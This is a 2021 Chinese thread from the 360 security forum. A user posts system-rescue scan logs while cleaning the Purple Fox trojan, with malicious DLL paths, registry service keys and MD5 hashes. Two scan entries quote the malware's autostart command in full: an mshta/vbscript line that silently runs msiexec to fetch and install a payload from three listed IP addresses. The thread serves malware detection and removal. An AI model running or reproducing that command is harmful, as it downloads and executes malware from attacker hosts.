绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 360商城 | 社区客户端

推荐论坛版块活动众测商城积分兑换常见问题
用系统急救箱第一遍查出残缺项之后
[ARRC] customScript.cmd
[ARRC] C:\windows\System32\Ms1FF8B784App.dll.dll
[CAutoRun]Repair By ARRDS 3
[-1]        File:C:\windows\System32\Ms1FF8B784App.dll.dll
MD5:
径:SYSTEM\CurrentControlSet\Services\Ms1FF8B784App
名:ServiceDll
值:C:\windows\System32\Ms1FF8B784App.dll
残缺项

PT 1
[RAB]00000000

中间突然重启之后,本体 C:\windows\System32\MsxxxxxxxxApp.dll 才出现在电脑上!
所以,第二遍360系统急救箱才能查到!

共 3 个关于紫狐木马还是很狡猾的的回复 最后回复于 2021-6-23 10:10

评论

直达楼层

沧桑浪子 VIP认证 LV10.上校 楼主 发表于 2021-6-23 09:22 | 显示全部楼层 | 私信
ScanPath default path 0

ScanPath default path 1

[FIF] bFIF=0, bSysL=0, bSpecial=0

[CPathCheck]Repair By RDF!
        [70]        File:C:\Windows\system32\MsAD632FCEApp.dll
        MD5:ba8c6938aa6973e5081f48f1d61e2969

        类别:文件目录 处理:清除木马 结果:1



ScanPath default path 2

ScanPath default path 3

ScanPath default path 4

ScanPath default path 5

ScanPath default path 6

ScanPath default path 7
王子佛 LV5.少尉 发表于 2021-6-23 09:53 | 显示全部楼层 | 私信
这个木马病毒也太危险了
沧桑浪子 VIP认证 LV10.上校 楼主 发表于 2021-6-23 10:10 | 显示全部楼层 | 私信
类型:无需启动的程序-建议禁止开机自动运行的程序
描述:此类程序为未知且非必需的开机自动运行程序,存在潜在安全风险,且会影响系统的运行速度。如果您确认其需要自动运行,请加入“信任程序列表”。
扫描引擎:云安全引擎
文件路径:C:\Windows\System32\mshta.exe
文件大小:13.5K (13,824 字节)
文件版本:11.00.9600.16428 (winblue_gdr.131013-1700)
文件描述:Microsoft (R) HTML Application host
文件指纹(MD5):95828d670cfd3b16ee188168e083c3c5
组别:服务
数字签名:Microsoft Windows
数字签名是否有效:有效
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\AC09
注册表名称:ImagePath
注册表值:mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (218.17.158.227:17287 59.44.206.198:18829 103.107.191.124:11815 ) do Msiexec /i http://%i/F12E5CE5.Png /Q",0)(window.close)
处理建议:禁止自启动

类型:无需启动的程序-建议禁止开机自动运行的程序
描述:此类程序为未知且非必需的开机自动运行程序,存在潜在安全风险,且会影响系统的运行速度。如果您确认其需要自动运行,请加入“信任程序列表”。
扫描引擎:云安全引擎
文件路径:C:\Windows\System32\cmd.exe
文件大小:337K (345,088 字节)
文件版本:6.1.7601.17514 (win7sp1_rtm.101119-1850)
文件描述:Windows Command Processor
文件指纹(MD5):5746bd7e255dd6a8afa06f7c42c1ba41
组别:服务
数字签名:Microsoft Windows
数字签名是否有效:有效
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\AC09
注册表名称:ImagePath
注册表值:mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (218.17.158.227:17287 59.44.206.198:18829 103.107.191.124:11815 ) do Msiexec /i http://%i/F12E5CE5.Png /Q",0)(window.close)
处理建议:禁止自启动
您需要登录后才可以回帖 登录 | 注册

本版积分规则

沧桑浪子 VIP认证 LV10.上校

粉丝:33 关注:11 积分:35447

精华:0 金币:21662 经验:29909

最后登录时间:2021-9-23

360安全路由 P1(冰川银) 奇酷手机旗舰版(全网通) 安全卫士10周年纪念 360手机 N5 360手机 N5S 360粉丝达人勋章 360手机N7 360商城青铜会员

私信 加好友

最新活动

画报征集活动

排行榜

热度排行 查看排行
今日 本周 本月 全部
    今日 本周 本月 全部

      内容推荐 热门推荐最新主帖

        关注360粉丝团,了解最新活动,抽锦鲤大奖,还有在线客服小姐姐等你来撩哦~

        快速回复 返回顶部 返回列表